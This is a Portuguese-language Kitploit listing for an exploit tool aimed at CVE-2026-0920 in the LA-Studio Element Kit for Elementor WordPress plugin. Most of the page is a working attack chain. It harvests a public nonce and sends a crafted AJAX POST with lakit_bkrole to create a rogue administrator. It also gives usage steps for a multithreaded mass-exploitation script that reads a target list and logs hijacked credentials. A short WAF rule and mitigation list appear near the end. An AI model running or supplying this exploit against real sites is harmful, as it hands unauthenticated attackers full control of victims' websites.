Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-0920-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e Educação
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole

Ver Repositório
213há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 O exploit chega aqui primeiro. Siga @KNxploited no Telegram — seu feed de elite com CVEs recém-divulgadas, PoCs funcionais e pesquisa de segurança de precisão. Atualizado incansavelmente. Feito para quem está à frente.


🧠 Visão Geral

CVE-2026-0920 é uma vulnerabilidade Crítica com CVSS 9.8 descoberta no plugin WordPress LA-Studio Element Kit for Elementor.

A falha reside na função ajax_register_handle(), que processa registros de usuários não autenticados via AJAX. A função não impõe nenhuma restrição ao parâmetro lakit_bkrole — permitindo que um atacante totalmente não autenticado atribua a si mesmo o papel administrator durante o registro, obtendo a assunção total do admin do WordPress em uma única requisição.


💀 Análise Aprofundada da Vulnerabilidade

A causa raiz é a ausência de uma verificação de capacidade de papel dentro do manipulador de registro AJAX do plugin:

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Por que isso é crítico:

  • wp_ajax_nopriv_* = acessível por qualquer pessoa sem nenhuma autenticação
  • lakit_bkrole aceita qualquer string de papel do WordPress — incluindo administrator
  • Uma única requisição POST cria uma conta de administrador com privilégios totais
  • O nonce necessário é exposto publicamente no HTML/JS do front-end do site
  • Sem limite de taxa, sem imposição de CAPTCHA por padrão, sem verificação de e-mail necessária

⚔️ Cadeia de Exploração

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisitos

root@kitploit:~
pip install requests colorama
DependênciaFinalidade
requestsRequisições HTTP, gerenciamento de sessão e cookies

Python 3.10+ recomendado (usa type hints de união str | None).


📂 Estrutura de Arquivos

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Uso

Passo 1 — Configurar as Credenciais (Opcional)

Abra o arquivo CVE-2026-0920.py e edite as constantes no topo para definir os dados desejados da conta de administrador:

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Passo 2 — Preparar os Alvos

Crie um arquivo list.txt com uma URL de alvo por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

URLs sem esquema recebem automaticamente o prefixo https://.


Passo 3 — Executar o Exploit

root@kitploit:~
python CVE-2026-0920.py

Você verá os seguintes prompts:

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Passo 4 — Monitorar a Saída ao Vivo

O script produz uma saída de terminal em tempo real e com código de cores:

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
CorSignificado

Passo 5 — Revisar os Resultados

Exploits bem-sucedidos são gravados em success_results.txt:

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

Cada linha contém o panorama completo: alvo, credenciais, status de login, status da resposta AJAX e o nonce utilizado.


🖥️ Referência de Parâmetros do Script


🔬 Lógica de Verificação

O script realiza uma verificação em dois estágios para eliminar falsos positivos:

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

Isso elimina falsos positivos causados por sites que retornam 200 OK no AJAX, mas falham silenciosamente no registro.


📊 Assinatura de Detecção

O exploit gera este padrão de rede específico — para defensores e autores de WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

Regra de WAF / IDS (Pseudocódigo):

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ Mitigação e Remediação

Se você é proprietário de site, desenvolvedor ou defensor, aja imediatamente:

  • ✅ Atualize o LA-Studio Element Kit for Elementor para uma versão acima de 1.5.6.3
  • ✅ Desative e exclua o plugin até que uma versão corrigida confirmada seja instalada
  • ✅ Audite todas as contas de administrador do WordPress — remova imediatamente qualquer entrada não reconhecida
  • ✅ Imponha validação de papel no lado do servidor — nunca confie em valores de papel fornecidos pelo usuário sem uma verificação de whitelist
  • ✅ Bloqueie requisições POST não autenticadas para admin-ajax.php contendo lakit_bkrole no nível do WAF
  • ✅ Monitore os logs de atividade do servidor e do WordPress em busca de chamadas de ação AJAX lakit_ajax
  • ✅ Ative a autenticação de dois fatores em todas as contas de administrador existentes como medida de contenção
  • ✅ Revise o aviso de segurança da Wordfence e aplique todas as etapas de endurecimento recomendadas

⚠️ Aviso Legal

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 Autor

ApelidoNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Siga @KNxploited no Telegram CVEs novas. Exploits funcionais. Pesquisa de vulnerabilidade aprofundada. Primeiro a saber. Primeiro a agir. Não seja o último.


Desenvolvido com precisão por Nxploited · Somente para pesquisa de segurança autorizada · CVSS 9.8 Crítico
Baixar ferramenta
CampoDetalhes
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versões AfetadasTodas as versões até 1.5.6.3 inclusive
Tipo de VulnerabilidadeEscalação de Privilégios Não Autenticada / Criação de Admin
Vetor de AtaqueRede — Nenhuma Autenticação Necessária
Pontuação CVSS 3.19.8 CRÍTICA
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoAssunção Total do Administrador do WordPress
PesquisadorNxploited
colorama
Saída colorida no terminal em todas as plataformas
threadingProcessamento concorrente de múltiplos alvos
reExtração de nonce baseada em regex a partir de HTML/JS
🔵 Ciano [*]Informativo — etapa em andamento
🟢 Verde [+]Sinal positivo — sucesso parcial ou total
🟡 Amarelo [!]Aviso — resultado ambíguo, requer revisão
🔴 Vermelho [-]Falha — alvo não explorável ou erro
ParâmetroPadrãoDescrição
Arquivo de alvoslist.txtArquivo contendo as URLs dos alvos
Threads10 (máx.: 50)Workers concorrentes
ADMIN_EMAIL[email protected]E-mail da conta admin injetada
ADMIN_PASSWORDadminSASenha da conta admin injetada
ADMIN_USERNAMENx_adminNome de usuário da conta admin injetada